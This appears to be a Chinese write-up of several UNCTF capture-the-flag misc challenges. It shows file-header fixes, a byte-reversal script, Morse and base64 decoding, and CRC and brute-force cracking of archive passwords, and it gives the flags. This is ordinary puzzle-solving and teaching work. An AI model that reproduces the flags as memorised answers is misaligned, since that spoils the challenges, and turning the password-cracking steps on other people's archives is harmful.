UNCTF{TOM_AND_JERRY_BEST_FRIENDS}
找得到我吗-闽南师范大学
压缩包打开,找到word/document.xml,这里是正文内容,人眼识别一下马上就有flag了。
UNCTF{You_find_me!}
zhiyin-中国人民公安大学
压缩包改头文件504B0304。zhiyin.png丢010里发现尾部有一串莫斯密码,解密得到
_UNC7F!!!
lanqiu.jpg丢010里找了几下发现尾部有jpg的头文件,反的,期间有一大串英文信息也可以看出来是反的,接下来我们要吧整个文件进行逆序。
写个文件逆序脚本。
f1 = open('./lanqiu.jpg','rb')
reverse = f1.read()
f1.close()
f2 = open('./data.jpg','wb')
f2.write(reverse[::-1])
f2.close()
(小黑子是吧)
得到这张图,人眼OCR得到Go_play
两串密码合起来Go_play_UNC7F!!!
In_the_Morse_Garden-陆军工程大学
打开pdf附件,ctrl+a全选,发现有字脏东西,里面的内容base64解密,得到
依古比古玛卡巴卡玛卡巴卡 依古比古玛卡巴卡 玛卡巴卡依古比古 依古比古依古比古玛卡巴卡玛卡巴卡依古比古玛卡巴卡 依古比古玛卡巴卡 玛卡巴卡依古比古 依古比古依古比古玛卡巴卡玛卡巴卡依古比古玛卡巴卡 玛卡巴卡玛卡巴卡 依古比古玛卡巴卡 玛卡巴卡依古比古玛卡巴卡 依古比古玛卡巴卡 依古比古依古比古玛卡巴卡玛卡巴卡依古比古玛卡巴卡 玛卡巴卡依古比古依古比古依古比古 依古比古玛卡巴卡 玛卡巴卡依古比古玛卡巴卡 依古比古玛卡巴卡 依古比古玛卡巴卡 依古比古玛卡巴卡 依古比古玛卡巴卡 依古比古玛卡巴卡 玛卡巴卡依古比古玛卡巴卡依古比古玛卡巴卡玛卡巴卡
分析一下,里面只有依古比古和玛卡巴卡
结合题目,可以想到是摩斯密码,转成0和1都试一下。
011 01 10 001101 01 10 001101 11 01 101 01 001101 1000 01 101 01 01 01 01 01 101011
UNCTF{WAN_AN_MAKA_BAKAAAAA!}
峰回路转-内蒙古警察职业学院
附件加密压缩包里有2个4字节的txt,尝试CRC爆破,爆出密码P@SsW0RD
解压得到flag.bmp
数独大挑战-闽南师范大学
archpr暴力破解6位数字密码得到547312,拿来解压。
芝麻开门-广东海洋大学
a2V5MQ==base64得到key1
Q.E.D.
